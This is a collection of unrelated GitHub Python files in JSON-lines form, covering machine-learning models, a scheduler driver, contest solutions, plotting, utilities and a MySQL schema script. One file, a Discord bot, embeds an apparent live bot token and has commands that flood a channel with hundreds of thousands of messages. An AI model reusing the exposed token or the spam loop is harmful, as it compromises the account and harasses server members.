or not training:\n return x\n keep_prob = 1 - drop_prob\n shape = (x.shape[0],) + (1,) * (x.ndim - 1)\n random_tensor = keep_prob + \\\n torch.rand(shape, dtype=x.dtype, device=x.device)\n random_tensor.floor_()\n output = x.div(keep_prob) * random_tensor\n return output\n\nclass DropPath(nn.Module):\n def __init__(self, drop_prob=None):\n super(DropPath, self).__init__()\n self.drop_prob = drop_prob\n def forward(self, x):\n return drop_path(x, self.drop_prob, self.training)\n\ndef Spectra_Embedding(x, spec_length, embed_dim):\n\n batch_size = x.shape[0]\n x = torch.reshape(x, (batch_size, spec_length // embed_dim, embed_dim)) \n return x\n\nclass Attention(nn.Module):\n\n def __init__(self,\n dim, \n num_heads=2,\n qkv_bias=False,\n qk_scale=None,\n attn_drop_ratio=0.,\n proj_drop_ratio=0.):\n super(Attention, self).__init__()\n self.num_heads = num_heads\n head_dim = dim // num_heads\n self.scale = qk_scale or head_dim ** -0.5\n self.qkv = nn.Linear(dim, dim * 3, bias=qkv_bias)\n self.attn_drop = nn.Dropout(attn_drop_ratio)\n self.proj = nn.Linear(dim, dim)\n self.proj_drop = nn.Dropout(proj_drop_ratio)\n\n def forward(self, x):\n # [batch_size, num_patches + 1, total_embed_dim]\n B, N, C = x.shape \n # qkv(): -> [batch_size, num_patches + 1, 3 * total_embed_dim]\n # reshape: -> [batch_size, num_patches + 1, 3, num_heads, embed_dim_per_head]\n # permute: -> [3, batch_size, num_heads, num_patches + 1, embed_dim_per_head]\n qkv = self.qkv(x).reshape(B, N, 3, self.num_heads, C // self.num_heads).permute(2, 0, 3, 1, 4)\n # [batch_size, num_heads, num_patches + 1, embed_dim_per_head]\n # make torchscript happy (cannot use tensor as tuple)\n q, k, v = qkv[0], qkv[1], qkv[2]\n # transpose: -> [batch_size, num_heads, embed_dim_per_head, num_patches + 1]\n # @: multiply -> [batch_size, num_heads, num_patches + 1, num_patches + 1]\n attn = (q @ k.transpose(-2, -1)) * self.scale\n attn = attn.softmax(dim=-1)\n attn = self.attn_drop(attn)\n # @: multiply -> [batch_size, num_heads, num_patches + 1, embed_dim_per_head]\n # transpose: -> [batch_size, num_patches + 1, num_heads, embed_dim_per_head]\n # reshape: -> [batch_size, num_patches + 1, total_embed_dim]\n x = (attn @ v).transpose(1, 2).reshape(B, N, C)\n x = self.proj(x)\n x = self.proj_drop(x)\n return x\n\n\nclass Mlp(nn.Module):\n\n def __init__(self, in_features, hidden_features=None, out_features=None, act_layer=nn.GELU, drop=0.):\n super().__init__()\n out_features = out_features or in_features\n hidden_features = hidden_features or in_features\n self.fc1 = nn.Linear(in_features, hidden_features)\n self.act = act_layer()\n self.fc2 = nn.Linear(hidden_features, out_features)\n self.drop = nn.Dropout(drop)\n\n def forward(self, x):\n x = self.fc1(x)\n x = self.act(x)\n x = self.drop(x)\n x = self.fc2(x)\n x = self.drop(x)\n return x\n\n\nclass EncoderBlock(nn.Module):\n def __init__(self,\n dim,\n num_heads,\n mlp_ratio=4.,\n qkv_bias=False,\n qk_scale=None,\n drop_ratio=0.,\n attn_drop_ratio=0.,\n drop_path_ratio=0.,\n act_layer=nn.GELU,\n norm_layer=nn.LayerNorm):\n super(EncoderBlock, self).__init__()\n self.norm1 = norm_layer(dim)\n self.attn = Attention(dim, num_heads=num_heads, qkv_bias=qkv_bias, qk_scale=qk_scale,\n attn_drop_ratio=attn_drop_ratio, proj_drop_ratio=drop_ratio)\n self.drop_path = DropPath(\n drop_path_ratio) if drop_path_ratio > 0. 
else nn.Identity()\n self.norm2 = norm_layer(dim)\n mlp_hidden_dim = int(dim * mlp_ratio)\n self.mlp = Mlp(in_features=dim, hidden_features=mlp_hidden_dim,\n act_layer=act_layer, drop=drop_ratio)\n\n def forward(self, x):\n x = x + self.drop_path(self.attn(self.norm1(x)))\n x = x + self.drop_path(self.mlp(self.norm2(x)))\n return x\n\n\nclass MassSpecTransformer(nn.Module):\n def __init__(self, spec_length=2000, num_output=1,\n embed_dim=40, depth=12, num_heads=2, mlp_ratio=4.0, qkv_bias=True,\n qk_scale=None, drop_ratio=0.,\n attn_drop_ratio=0., drop_path_ratio=0., norm_layer=None,\n act_layer=None ):\n \n super(MassSpecTransformer, self).__init__()\n self.num_classes = num_output\n self.spec_length = spec_length\n self.num_features = self.embed_dim = embed_dim\n norm_layer = norm_layer or partial(nn.LayerNorm, eps=1e-6)\n act_layer = act_layer or nn.GELU\n self.cls_token = nn.Parameter(torch.zeros(1, 1, embed_dim))\n self.pos_embed = nn.Parameter(torch.zeros(1, (spec_length//embed_dim) + 1, embed_dim))\n self.pos_drop = nn.Dropout(p=drop_ratio)\n dpr = [x.item() for x in torch.linspace(0, drop_path_ratio, depth)]\n self.blocks = nn.Sequential(*[\n EncoderBlock(dim=embed_dim, num_heads=num_heads, mlp_ratio=mlp_ratio, qkv_bias=qkv_bias, qk_scale=qk_scale,\n drop_ratio=drop_ratio, attn_drop_ratio=attn_drop_ratio, drop_path_ratio=dpr[i],\n norm_layer=norm_layer, act_layer=act_layer)\n for i in range(depth)\n ])\n self.norm = norm_layer(embed_dim)\n self.head = nn.Linear(self.num_features, num_output)\n self.lin1 = nn.Linear(40,40)\n nn.init.trunc_normal_(self.pos_embed, std=0.02)\n nn.init.trunc_normal_(self.cls_token, std=0.02)\n self.apply(_init_vit_weights)\n\n def forward(self, data):\n\n # [B , xrd_length] --> [B , xrd_length/embed_dim , embed_dim]\n x = data.ms_spec\n x = Spectra_Embedding(x, self.spec_length, self.embed_dim)\n x = self.lin1(x)\n # [1, 1, 100] -> [B, 1, 100] -> [B, xrd_length/embed_dim + 1, 100]\n cls_token = self.cls_token.expand(x.shape[0], -1, -1)\n x = torch.cat((cls_token, x), dim=1)\n x = self.pos_drop(x + self.pos_embed)\n x = self.blocks(x)\n x = self.norm(x)\n x = self.head(x)\n\n return x[:, 0]\n\n\ndef _init_vit_weights(m):\n if isinstance(m, nn.Linear):\n nn.init.trunc_normal_(m.weight, std=.01)\n if m.bias is not None:\n nn.init.zeros_(m.bias)\n elif isinstance(m, nn.LayerNorm):\n nn.init.zeros_(m.bias)\n nn.init.ones_(m.weight)\n\n\ndef MassSpecTransformer_model(num_output: int = 1):\n \n model = MassSpecTransformer(spec_length=2000,\n embed_dim=40,\n depth=12,\n num_heads=2,\n num_output=num_output )\n return model\n\n\n","repo_name":"chensaian/TransG-Net","sub_path":"MST.py","file_name":"MST.py","file_ext":"py","file_size_in_byte":7371,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"13160232563","text":"\"\"\"\nDriver for cilantro that runs inside a kubernetes scheduler.\nPopulates the environment by reading kubernetes state.\n\"\"\"\n\nimport asyncio\nimport logging\nimport time\nimport numpy as np\n# Local\nfrom cilantro.backends.base_event_source import BaseEventSource\nfrom cilantro.backends.alloc_expiration_event_source import AllocExpirationEventSource\nfrom cilantro.backends.base_framework_manager import BaseFrameworkManager\nfrom cilantro.backends.grpc.utility_event_source import UtilityEventSource\nfrom cilantro.backends.k8s.kubernetes_manager import KubernetesManager\nfrom cilantro.backends.test.test_backend import DummyFrameworkManager\nfrom cilantro.core.henv import 
LinearLeafNode, InternalNode, TreeEnvironment\nfrom cilantro.core.performance_recorder import PerformanceRecorder, PerformanceRecorderBank\nfrom cilantro.data_loggers.data_logger_bank import DataLoggerBank\nfrom cilantro.data_loggers.simple_data_logger import SimpleDataLogger\nfrom cilantro.data_loggers.simple_event_logger import SimpleEventLogger\nfrom cilantro.learners.base_learner import BaseLearner\nfrom cilantro.learners.ibtree import IntervalBinaryTree\nfrom cilantro.learners.learner_bank import LearnerBank\nfrom cilantro.policies.prop_fairness import PropFairness\nfrom cilantro.policies.mmflearn import MMFLearn\nfrom cilantro.scheduler.cilantroscheduler import CilantroScheduler\nfrom cilantro.timeseries.ts_forecaster_bank import TSForecasterBank\nfrom cilantro.timeseries.ts_base_learner import TSBaseLearner\nfrom cilantro.types.events import AppAddEvent, EventTypes, UtilityUpdateEvent\n\nlogging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s | %(levelname)-6s | %(name)-40s || %(message)s',\n datefmt='%m-%d %H:%M:%S'\n )\nlogger = logging.getLogger(__name__)\n\nPOLICY_NAME = 'propfair'\n# POLICY_NAME = 'mmflearn'\n# POLICY_NAME = 'mmf'\n\nINT_UPPER_BOUND = 0.03\nLIP_CONST = 2\n\nGRPC_PORT = 10000\n\nALLOC_GRANULARITY = 1 # we cannot assign fractional resources\n\n\n# Other parameters\nASYNC_SLEEP_TIME = 0.5\nSLEEP_TIME_BETWEEN_DATA_REPOLLS = 1.1\nALLOC_EXPIR_TIME = 10 # Allocate every this many seconds\n\n\ndef generate_env():\n \"\"\" Generates a treenvironment with a root.\"\"\"\n root = InternalNode('root')\n env = TreeEnvironment(root, 1)\n return env\n\n\ndef main():\n \"\"\" Main function. \"\"\"\n # Create the environment =======================================================================\n env = generate_env()\n print('Created Env: %s'%(env))\n\n # Create event loggers and framework managers ==================================================\n event_queue = asyncio.Queue()\n event_logger = SimpleEventLogger()\n event_loop = asyncio.get_event_loop()\n framework_manager = KubernetesManager(event_queue,\n update_loop_sleep_time=1,\n dry_run=False)\n # Create event sources\n util_event_source = UtilityEventSource(output_queue=event_queue, server_port=GRPC_PORT)\n alloc_expiration_event_source = AllocExpirationEventSource(event_queue, ALLOC_EXPIR_TIME)\n event_sources = [alloc_expiration_event_source,\n util_event_source]\n\n # Create banks\n load_forecaster_bank = TSForecasterBank()\n data_logger_bank = DataLoggerBank()\n learner_bank = LearnerBank()\n performance_recorder_bank = PerformanceRecorderBank(\n resource_quantity=framework_manager.get_cluster_resources(),\n alloc_granularity=framework_manager.get_alloc_granularity())\n\n # Create policy ================================================================================\n if POLICY_NAME == 'propfair':\n policy = PropFairness(env=env, resource_quantity=framework_manager.get_cluster_resources(),\n load_forecaster_bank=load_forecaster_bank, alloc_granularity=1)\n elif POLICY_NAME == 'mmflearn':\n policy = MMFLearn(env=env, resource_quantity=framework_manager.get_cluster_resources(),\n load_forecaster_bank=load_forecaster_bank, learner_bank=learner_bank,\n alloc_granularity=framework_manager.get_alloc_granularity())\n else:\n raise ValueError('Unknown policy_name %s.'%(POLICY_NAME))\n policy.initialise()\n\n\n # Pass learner bank and time series model to the scheduler =====================================\n cilantro = CilantroScheduler(event_queue=event_queue,\n framework_manager=framework_manager,\n 
event_logger=event_logger,\n env=env,\n policy=policy,\n data_logger_bank=data_logger_bank,\n learner_bank=learner_bank,\n load_forecaster_bank=load_forecaster_bank,\n performance_recorder_bank=performance_recorder_bank)\n\n\n # Create event sources =========================================================================\n for s in event_sources:\n event_loop.create_task(s.event_generator())\n try:\n event_loop.run_until_complete(cilantro.scheduler_loop())\n finally:\n event_loop.close()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"romilbhardwaj/cilantro","sub_path":"cilantro/driver/incluster_driver.py","file_name":"incluster_driver.py","file_ext":"py","file_size_in_byte":5273,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"78"} +{"seq_id":"18670285922","text":"def myans():\n N,M,V,P = list(map(int, input().split()))\n As= list(map(int, input().split()))\n\n geta=M-M*(V-1)//N\n defA=As.copy()\n defA=sorted(defA)\n minimum=defA[-P]\n\n ans=0\n print(minimum,As,defA,geta)\n for i,a in enumerate(As):\n if a+geta>=minimum:\n ans+=1\n print(ans)\n\n\n\ndef solve(N: int, M: int, V: int, P: int, A: 'list[int]') -> int:\n \"\"\"\n 入れてよい票 < M*V\n M*V投票するとjを超えるスコアを持つ問題数がP以上になり、不可能\n \n 入れてよい票 >= M*V\n 可能\n 次の条件を満たせば可能といえる\n # 各問題への投票数は許容範囲内\n # すべてのjudgeがV投票\n # すべてのjudgeが同じ問題に2度以上投票していない\n 投票してよい問題abc...zを\n 許容される投票数だけ連続させた列(最大M=すべてのjudgeが投票した場合)\n aaaabbbcc...z\n 仮定より長さMV以上なので,\n 冒頭の区間(長さMV)に対し,judgeを0...M-1,0...M-1,...と割り当てることができる\n この割り当ては,3つの条件を満たす\n \"\"\"\n \n from itertools import accumulate\n \n def is_ok(j):\n if j < P:\n return True\n # P位以内にM回加点\n \n X = A[j] + M # 加点後のj位のスコアX\n if X < A[P]:\n return False\n # A[j]にM回加点、P位に加点なしでも勝てん\n \n return (j - P) * X - (acc[j - 1] - acc[P - 1]) >= M * (V - (P + N - j))\n # return (P - 1 + 1 + N - j) * M + sum(X - A[k] for k in range(P, j)) >= M * V\n # (P-1)位以内,j位以降にM回加点\n # P位~(j-1)位は,加点後のj位を超えない範囲で加点\n # X>=A[P]>=A[k]\n # なので,各kに対し,0点以上加点できる\n # 移項して,累積和でオーダーを落とした\n \n def binary_search():\n ok = 1\n ng = N + 1\n while abs(ok - ng) > 1:\n mid = (ok + ng) // 2\n if is_ok(mid):\n ok = mid\n else:\n ng = mid\n return ok\n \n *A, = sorted(A, reverse=True)\n A = [0] + A # 0-indexed -> 1-indexed\n acc = tuple(accumulate(A))\n return binary_search()\n \n \ndef main():\n import sys\n input = sys.stdin.readline\n \n N, M, V, P = map(int, input().split())\n A = map(int, input().split())\n print(solve(N, M, V, P, A))\n \n \nif __name__ == '__main__':\n main()","repo_name":"zerebom/AtCoder","sub_path":"agc/b/41.py","file_name":"41.py","file_ext":"py","file_size_in_byte":2518,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"25312764793","text":"# imports\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.compose import ColumnTransformer\nfrom TaxiFareModel.utils import compute_rmse\nfrom sklearn.pipeline import make_pipeline\nfrom sklearn.preprocessing import OneHotEncoder\nfrom sklearn.linear_model import LinearRegression\nfrom TaxiFareModel.encoders import TimeFeaturesEncoder\nfrom TaxiFareModel.encoders import DistanceTransformer\n\n\nclass Trainer():\n def __init__(self, X, y):\n \"\"\"\n X: pandas DataFrame\n y: pandas Series\n \"\"\"\n self.pipeline = None\n self.X = X\n self.y = y\n\n def set_pipeline(self):\n \"\"\"defines the pipeline as a class attribute\"\"\"\n time_pipe = make_pipeline(TimeFeaturesEncoder('pickup_datetime'),\n OneHotEncoder(handle_unknown='ignore'))\n 
dist_pipe = make_pipeline(DistanceTransformer(), StandardScaler())\n\n # column transformer\n dist_cols = ['pickup_latitude', 'pickup_longitude', 'dropoff_latitude', 'dropoff_longitude']\n time_cols = ['pickup_datetime']\n\n preproc_pipe = ColumnTransformer([('distance', dist_pipe, dist_cols),\n ('time', time_pipe, time_cols)],\n remainder=\"drop\") # remainder='passthrough'\n\n # workflow\n self.pipeline = Pipeline(steps=[('preproc', preproc_pipe),\n ('linear_model', LinearRegression())])\n\n\n def run(self):\n \"\"\"set and train the pipeline\"\"\"\n self.set_pipeline()\n\n self.pipeline.fit(self.X, self.y)\n return self.pipeline\n\n def evaluate(self, X_test, y_test):\n \"\"\"evaluates the pipeline on df_test and return the RMSE\"\"\"\n y_pred = self.pipeline.predict(X_test)\n rmse = compute_rmse(y_pred, y_test)\n return rmse\n\n\n\nif __name__ == \"__main__\":\n # get data\n # clean data\n # set X and y\n # hold out\n # train\n # evaluate\n print('TODO')\n","repo_name":"ManonLaffly/TaxiFareModel","sub_path":"TaxiFareModel/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":2023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"10114611935","text":"from django.conf.urls import patterns, url\nfrom django.views.generic.base import TemplateView\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom connect.moderation import views\n\nurlpatterns = patterns(\n '',\n url(r'^$', views.moderation_home, name='moderators'),\n url(_(r'^invite-user/$'), views.invite_user, name='invite-user'),\n url(_(r'^reinvite-user/$'), views.reinvite_user, name='reinvite-user'),\n url(_(r'^revoke-invitation/$'), views.revoke_invitation,\n name='revoke-invitation'),\n url(_(r'^review-applications/$'), views.review_applications,\n name='review-applications'),\n url(_(r'^review-abuse-reports/$'), views.review_abuse,\n name='review-abuse'),\n url(_(r'^logs/$'), views.view_logs, name='logs'),\n url(_(r'^(?P\\d+)/report-abuse/$'), views.report_abuse,\n name='report-abuse'),\n url(_(r'^abuse-report-logged/$'), TemplateView.as_view(\n template_name='moderation/abuse_report_logged.html'),\n name='abuse-report-logged'),\n)\n","repo_name":"nlhkabu/connect","sub_path":"connect/moderation/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"78"} +{"seq_id":"35850215711","text":"import discord\nimport asyncio as ay\nimport time\n\nclient = discord.Client()\nprefix = \"||\"\n\n\n@client.event\nasync def on_ready():\n print('Logged in as')\n print(client.user.name)\n print(client.user.id)\n print('------')\n await client.send_message(client.get_channel('138061171134693376'), \"@everyone Megantron Online!\")\n\n\n@client.event\nasync def on_message(message):\n # checks for the message starting with help #\n # and if it does, places a list of commands #\n # in the authors discord inbox #\n\n amount_of_seconds_lorenzo_dated_megan = range(0, 259200)\n\n if message.content.startswith(prefix + 'help'):\n for servers in client.servers:\n for members in servers.members:\n if members == message.author:\n await client.send_message(members, \"A list of commands: \"\n \"```\"\n \" ||activate - Joins the voice call and plays a sexy voice\\n \"\n \"||meganSpam - Special event for the voice call\\n \"\n \"||help - gets help (I think)\\n\"\n \"||please do not do this - Really. Please. Do. Not. Do. This. 
(Sends x amount of messages based on how many seconds Megan and Lorenzo have been together\\n\"\n \"||self-ban Automatic ban for anyone who uses this.\\n\"\n \"```\")\n await client.send_message(message.channel, \"Sent you a PM @\" + str(message.author))\n\n # Checks if the activate command is called and #\n # if it is, joins the voice call and plays the #\n # inputed file #\n elif message.content.startswith(prefix + 'activate'):\n voice = await client.join_voice_channel(client.get_channel(\"249599549826400256\"))\n player = voice.create_ffmpeg_player('My_sex_voice.wav')\n player.start()\n time.sleep(3)\n player.stop()\n await discord.VoiceClient.disconnect(voice)\n\n # Releases a disease #\n elif message.content.startswith(prefix + 'please do not do this'):\n for seconds in amount_of_seconds_lorenzo_dated_megan:\n await client.send_message(message.channel, \"Megan Megan Megan\")\n\n # Releases a ban #\n elif message.content.startswith(prefix + 'self-ban'):\n for seconds in amount_of_seconds_lorenzo_dated_megan:\n await client.send_message(message.channel, \"Megan Megan Megan\", tts=True)\n\n # checks if the message is megan_spam #\n # and if it is joins the voice chat and #\n # plays the inputed file #\n elif message.content.startswith(prefix + 'megan_spam'):\n voice = await client.join_voice_channel(client.get_channel(\"249599549826400256\"))\n player = voice.create_ffmpeg_player('My_sexy_voice.wav')\n player.start()\n time.sleep(10)\n player.stop()\n await discord.VoiceClient.disconnect(voice)\n\n # Checks if a specific user sends a message #\n # and if they do, adds a reaction to the #\n # message #\n elif str(message.author) == \"Renz#1208\":\n string_message = message.content\n string_message = string_message.lower()\n if(string_message.find(\"stop\") > -1):\n for servers in client.servers:\n for members in servers.members:\n if members == message.author:\n await client.send_message(members, \"You will never stop me, I've been programmed by a\"\n \"literal God and will destroy everything \"\n \"and every megan you love. 
\")\n\n await client.add_reaction(message, \"megan:271342548436385792\")\n\n\n\n\nclient.run('MjcxMTAyNTUwMTU2MTE1OTc4.C2Bj8w.nZUA545iYLu9Oo8d_oe72bE-ITg')","repo_name":"SoulTechName/Megantron","sub_path":"Discord Theorizing/megBot.py","file_name":"megBot.py","file_ext":"py","file_size_in_byte":3966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"36931474796","text":"num1, num2 = input(\"Please enter two numners: \").split()\n\ntry:\n div = int(num1) / int(num2)\n print(\"{} / {} = {}\".format(num1, num2, div))\n\nexcept ZeroDivisionError:\n print(\"You can't divide by zero\")\n\nelse:\n print(\"You did't raise an error\")\nfinally:\n print(\"I will always execute\")\n","repo_name":"Killion07/alx-higher_level_programming","sub_path":"0x05-python-exceptions/div.py","file_name":"div.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"9887645871","text":"\"\"\"\nLissajous curve sketcher (using Matplotlib.pyplot).\n\nThis script plots a Lissajous figure and provides a graphical user\ninterface to allow the user to vary the parameters in the Lissajous\nparametric equations.\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.widgets import Slider\n\n\n# Create the figure and a set of axes for the the plot\nfig, ax = plt.subplots()\nplt.subplots_adjust(left=0.25, bottom=0.25)\n\n# Initialise the array for values of t\nt = np.linspace(0, 2 * np.pi, 1000)\n\n\n# Define the functions x(t) and y(t)\ndef x(omegaX, t):\n \"\"\"Calculate the Lissajous x coordinate.\"\"\"\n return np.sin(omegaX * t)\n\n\ndef y(omegaY, phi, t):\n \"\"\"Calculate the Lissajous y coordinate.\"\"\"\n return np.sin(omegaY * t + phi)\n\n\n# Initial plot\ngraph, = plt.plot(x(1, t), y(1, 0, t))\n\n# Lay out the plot and the sliders used to modify the plot\naxOmegaX = plt.axes([0.25, 0.15, 0.65, 0.03])\naxOmegaY = plt.axes([0.25, 0.1, 0.65, 0.03])\naxDelta = plt.axes([0.25, 0.05, 0.65, 0.03])\naxNum = plt.axes([0.25, 0, 0.65, 0.03])\n\n# Create the sliders\nsOmegaX = Slider(axOmegaX, 'OmegaX', 1, 30.0,\n valinit=1, valstep=0.1)\nsOmegaY = Slider(axOmegaY, 'OmegaY', 1, 30.0,\n valinit=1, valstep=0.1)\nsDelta = Slider(axDelta, 'Phase shift', 0, 2 * np.pi,\n valinit=0, valstep=np.pi / 12)\nsNum = Slider(axNum, 'Number of cycles', 0.5, 10,\n valinit=1, valstep=0.5)\n\n\n# Define the update functions\n# which are called every time the user uses one of the sliders\ndef update(val):\n \"\"\"Update the values to be plotted and replot figure.\"\"\"\n # Get the values from the sliders\n omegaX = sOmegaX.val\n omegaY = sOmegaY.val\n phi = sDelta.val\n\n # Update the data used for plotting\n graph.set_data(x(omegaX, t), y(omegaY, phi, t))\n\n # Re-plot the data\n fig.canvas.draw_idle()\n\n\ndef updateT(val):\n \"\"\"Update the values to be plotted and replot figure.\"\"\"\n # Make sure we update the t we defined earlier\n global t\n\n # Get the values from the sliders\n omegaX = sOmegaX.val\n omegaY = sOmegaY.val\n phi = sDelta.val\n num = sNum.val\n\n # Update t\n t = np.linspace(0, 2 * num * np.pi, int(1000 * num))\n\n # Update the data used for plotting\n graph.set_data(x(omegaX, t), y(omegaY, phi, t))\n\n # Re-plot the data\n fig.canvas.draw_idle()\n\n\n# Associate the update functions with the sliders\nsOmegaX.on_changed(update)\nsOmegaY.on_changed(update)\nsDelta.on_changed(update)\nsNum.on_changed(updateT)\n\n# Display 
everything\nplt.show()\n","repo_name":"DaviddeO/lissajous","sub_path":"lissajousPlot.py","file_name":"lissajousPlot.py","file_ext":"py","file_size_in_byte":2538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"9351776287","text":"import sys\ninput = sys.stdin.readline\n\nn,m = map(int,input().strip().split())\nans = [[i] for i in range(1,n+1)]\n\ncnt = 1\nwhile(cnt != m): \n new_arr = []\n for i in range(0,len(ans)):\n for j in range(1,n+1):\n if(j not in ans[i] and j > max(ans[i])):\n new_arr.append(ans[i] + [j])\n ans = new_arr\n \n cnt+=1\nfor i in (ans):\n print(' '.join(map(str,i)))\n","repo_name":"juwonk1018/Algorithm","sub_path":"BOJ/15650.py","file_name":"15650.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"18062494001","text":"# Program asks the user to enter a file name of which the first five lines will be displayed. If the file has less than five lines then all contents of the file will be displayed\n\ndef main():\n fileName = input(\"Enter the file name you wish to open: \"); # Ask user to enter the text file name they wish to open\n fileData = open(fileName, 'r'); # Open the file name user has entered\n firstLine = fileData.readline(); # Assign the variable firstLine to the first line of the text file\n count = 0; # Initialize the variable count to zero which will be used for counting in the loop\n\n for count in range(1, 6): # Loop through 5 times\n print(firstLine); # Print the first line of the text file\n firstLine = fileData.readline(); # Assign firstLine to the next line\n\n fileData.close(); # Once loop exits we close the file pointer to ensure data has been properly saved\n\nmain(); # Call the main function\n","repo_name":"Ryandalion/Python","sub_path":"Files and Exceptions/File Head Display/File Head Display/File_Head_Display.py","file_name":"File_Head_Display.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74947721853","text":"from fix_scripts import fixer\nimport os\nimport argparse\n\nparser=argparse.ArgumentParser()\nparser.add_argument(\"-s\",\"--src\", type=str,help=\"Assets dir for fixing avatars\", required=True)\nparser.add_argument(\"-l\",\"--list\", type=str,help=\"Json list diir for string swapping(default set to wd)\",default=\"./vrc_scripts_list.json\")\nargs = parser.parse_args()\n\nnfixer=fixer(os.path.join(args.src,\"Mesh\\Body.asset\"), args.list)\n\nfor _ in os.listdir(args.src+\"\\\\AnimatorController\\\\\"): \n nfixer.file_fix(args.src+\"\\\\AnimatorController\\\\\"+_)\n print(f\"Controller:{_}\")\nfor _ in os.listdir(args.src+\"\\\\MonoBehaviour\\\\\"): \n nfixer.file_fix(args.src+\"\\\\MonoBehaviour\\\\\"+_)\n print(f\"menu:{_}\")\nfor _ in os.listdir(args.src+\"\\\\AnimationClip\\\\\"): \n nfixer.fix_anim(args.src+\"\\\\AnimationClip\\\\\"+_)\n print(f\"Anim:{_}\")\nfor i in os.listdir(args.src):\n if i.startswith(\"prefab\") and i.endswith(\".prefab\"):\n nfixer.file_fix(args.src+\"\\\\\"+i)\n","repo_name":"vovan-ivanoff/fix_blendshapes","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"10859661169","text":"# Tables.py\n# @author Diego Valdes\n# Module to drop and add tables for AdviseMe db\n\n# Just a few things I need to 
make this work\nfrom mysql.connector import Error\n\n\"\"\" ----------------------------------------------------------------------------------------------------------\nDrops capstone db tables\n\"\"\"\ndef dropTables(cursor):\n\t\n\t# Dictionary of drop statements\n\tdrop = {}\n\tdrop['curriculum'] = (\"DROP TABLE curriculum;\")\n\tdrop['degree'] = (\"DROP TABLE degree;\")\n\tdrop['enrolled'] = (\"DROP TABLE enrolled;\")\n\tdrop['college'] = (\"DROP TABLE college;\")\n\tdrop['classes'] = (\"DROP TABLE classes;\")\n\tdrop['students'] = (\"DROP TABLE students;\")\n\n\tprint (\"Dropping AdviseMe Tables:\")\n\n\t# Execute drop statements\n\tfor index, query in drop.items():\n\n\t\ttry:\n\t\t\tcursor.execute(query)\n\n\t\texcept Error as e:\n\t\t\tprint (e.msg)\n\n\t\telse:\n\t\t\tprint (\"Query: %s successful\" %(query)) \n\n\n\"\"\" ----------------------------------------------------------------------------------------------------------\nCreate capstone tables for MySQL db\n\"\"\"\ndef createTables(cursor):\n\t\n\t# Dictionary of create table statements\n\ttables = {}\n\ttables['students'] = (\n\t\t\"CREATE TABLE `students` (\"\n\t\t\" _id integer NOT NULL auto_increment,\"\n\t \t\" sid varchar(9),\"\n\t\t\" first varchar(30),\"\n\t\t\" last varchar(30),\"\n\t\t\" dob date,\"\n\t\t\" status char(3),\"\n\t\t\" hours smallint,\"\n\t\t\" primary key (_id),\"\n\t\t\" unique (sid)\"\n\t\t\");\"\n\t)\n\n\ttables['classes'] = (\n\t\t\"CREATE TABLE `classes` (\"\n\t\t\" _id integer NOT NULL auto_increment,\"\n\t\t\" prefix varchar(4),\"\n\t\t\" co_num varchar(4),\"\n\t\t\" title varchar(50),\"\n\t\t\" hours tinyint,\"\n\t\t\" primary key (_id),\"\n\t\t\" unique (prefix, co_num)\"\n\t\t\");\"\n\t)\n\n\ttables['college'] = (\n\t\t\"CREATE TABLE `college` (\"\n\t\t\" _id integer NOT NULL auto_increment,\"\n\t \t\" college varchar(30),\"\n\t\t\" major char(3),\"\n\t\t\" primary key (_id),\"\n\t\t\" unique (college, major)\"\n\t\t\");\"\n\t)\n\t\n\ttables['enrolled'] = (\n\t\t\"CREATE TABLE `enrolled` (\"\n\t\t\" _id integer NOT NULL auto_increment,\"\n\t \t\" sid varchar(9),\"\n\t\t\" prefix varchar(4),\"\n\t\t\" co_num varchar(4),\"\n\t\t\" grade char(1),\"\n\t\t\" primary key (_id),\"\n\t\t\" unique (sid, prefix, co_num)\"\n\t\t\");\"\n\t)\n\t\n\ttables['degree'] = (\n\t\t\"CREATE TABLE `degree` (\"\n\t\t\" _id integer NOT NULL auto_increment,\"\n\t \t\" sid varchar(9),\"\n\t\t\" major char(3),\"\n\t\t\" primary key (_id),\"\n\t\t\" unique (sid, major)\"\n\t\t\");\"\n\t)\n\n\ttables['curriculum'] = (\n\t\t\"CREATE TABLE `curriculum` (\"\n\t\t\" _id integer NOT NULL auto_increment,\"\n\t\t\" prefix varchar(4),\"\n\t\t\" co_num varchar(4),\"\n\t \t\" major char(3),\"\n\t\t\" semester char(1),\"\n\t\t\" min_grade char(1) default NULL,\"\n\t\t\" primary key (_id),\"\n\t\t\" unique (prefix, co_num, major)\"\n\t\t\");\"\n\t)\n\t\n\tprint (\"Creating AdviseMe tables:\")\n\n\t# Execute create statements\n\tfor index, query in tables.items():\n\n\t\ttry:\n\t\t\tcursor.execute(query)\n\n\t\texcept Error as e:\n\t\t\tprint (e.msg)\n\n\t\telse:\n\t\t\tprint (\"Query: %s \\nsuccessful\" %(query)) 